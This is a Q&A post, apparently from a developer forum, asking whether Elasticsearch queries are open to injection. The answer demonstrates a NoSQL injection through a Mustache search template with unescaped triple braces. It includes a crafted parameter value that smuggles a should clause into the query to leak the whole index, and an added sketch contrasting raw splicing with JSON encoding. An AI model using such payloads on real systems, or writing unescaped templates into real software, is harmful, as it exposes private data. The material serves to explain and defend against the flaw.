Preventing NoSQL injections with Elasticsearch


Problem description



I'm building an Elasticsearch query using QueryBuilders in my backend. The cluster is not directly exposed to the internet, and only accessed through the backend.

I've noticed that I am providing it with un-sanitized user input, and it reminded me of SQL injections. I know how to prevent SQL injections, but I'm not sure that the QueryBuilder escapes the input?

I found that there is a thing called 'Search Templates', which use mustache. Do they maybe escape the content properly? Are they 'the way to go' to prevent such problems?

I'm not even sure what the problematic user input could be like. When using the QueryBuilder, I don't think the HTTP METHOD of the query could be changed.

Maybe scripting could be a problem, but that can be disabled.

To reiterate my question: are code injections a problem for Elasticsearch, and if yes, what are the best ways to mitigate them?

Thanks! :)

Solution

You can find all previously detected security flaws in ES, but NoSQL injection has never been one of them... so far.

However, you can find some literature that talks about how to do just that. Also some other discussions and resources might be worth reading.

As a quick example, it is definitely possible to create a NoSQL injection attack when using search templates that are leveraging the Mustache templating language. For instance, say we have the following two documents:

PUT attack/doc/1
{
  "field1": 2,
  "field2": 1
}
PUT attack/doc/2
{
  "field1": 2,
  "field2": 2
}

And a template query on field1 that (wrongly) uses triple mustaches:

POST _scripts/attack
{
  "script": {
    "lang": "mustache",
    "source": """
{
  "query": {
    "bool": {
      "filter": [
        {
          "term": {
            "field1": {{{field}}}
          }
        },
        {
          "range": {
            "field2": {
              "gte": 2
            }
          }
        }
      ]
    }
  }
}
    """
  }
}

By using a cleverly chosen value for the field parameter, we can leak the whole index:

POST attack/_search/template
{
  "id": "attack",
  "params": {
    "field": "2}}],\"should\":[{\"range\":{\"field2\":{\"lte\":2}"
  }
}

The final query would look like this, i.e. we were able to insert a should clause that basically leaks the whole index:

  {
    "query" : {
      "bool" : {
        "filter" : [
          {
            "term" : {
              "field1" : 2
            }
          }
        ],
        "should" : [
          {
            "range" : {
              "field2" : {
                "lte" : 2
              }
            }
          },
          {
            "range" : {
              "field2" : {
                "gte" : 2
              }
            }
          }
        ]
      }
    }
  }
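For comparison, here is an added Python sketch (not part of the original answer, and not Elasticsearch's Mustache engine) that renders the answer's template twice with the parameter value shown above: once spliced in verbatim, as the triple mustache does, and once serialized as a single JSON token. The `@@FIELD@@` marker and all function names are hypothetical, and `coerce_field` assumes `field1` is an integer as in the sample documents.

```python
import json

# The answer's template with its Mustache tag replaced by a constructed marker.
# Plain string substitution stands in for rendering; this is not a Mustache engine.
TEMPLATE = """{
  "query": {"bool": {"filter": [
    {"term": {"field1": @@FIELD@@}},
    {"range": {"field2": {"gte": 2}}}
  ]}}
}"""

# Parameter value quoted from the answer above.
PAYLOAD = '2}}],"should":[{"range":{"field2":{"lte":2}'


def render_raw(value):
    """Splice the value in verbatim, as an unescaped {{{field}}} tag does."""
    return TEMPLATE.replace("@@FIELD@@", str(value))


def render_encoded(value):
    """Serialize the value as a single JSON token before substitution."""
    return TEMPLATE.replace("@@FIELD@@", json.dumps(value))


def bool_clauses(rendered):
    """Clause names of the rendered bool query, or None if it is not valid JSON."""
    try:
        return sorted(json.loads(rendered)["query"]["bool"])
    except (ValueError, KeyError, TypeError):
        return None


def term_value(rendered):
    """The value that field1 is actually compared against after rendering."""
    return json.loads(rendered)["query"]["bool"]["filter"][0]["term"]["field1"]


def coerce_field(value):
    """Backend check (assumption: field1 is an integer, as in the sample docs)."""
    return int(str(value))  # raises ValueError for anything but an integer


if __name__ == "__main__":
    for name, render in (("raw", render_raw), ("encoded", render_encoded)):
        print(name, bool_clauses(render(PAYLOAD)))
```

In an Elasticsearch search template, the encoded variant corresponds to rendering the parameter with `{{#toJson}}field{{/toJson}}` instead of `{{{field}}}`; validating the parameter's type in the backend before it reaches the template covers the same case independently.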
